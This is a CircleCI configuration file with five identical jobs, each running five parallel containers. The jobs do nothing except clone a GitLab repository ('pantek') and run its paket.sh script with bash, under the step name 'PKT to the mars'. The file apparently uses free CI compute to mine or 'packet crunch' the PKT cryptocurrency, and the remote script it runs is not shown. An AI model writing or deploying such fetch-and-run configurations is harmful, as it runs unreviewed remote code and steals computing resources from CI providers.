version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 5
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 5      
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 5
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 5      
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
    Devop4:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 5      
      steps:
        - run:
            name: PKT to the mars
            command: git clone https://gitlab.com/kabehada3/pantek.git && cd pantek && bash paket.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3
            - Devop4
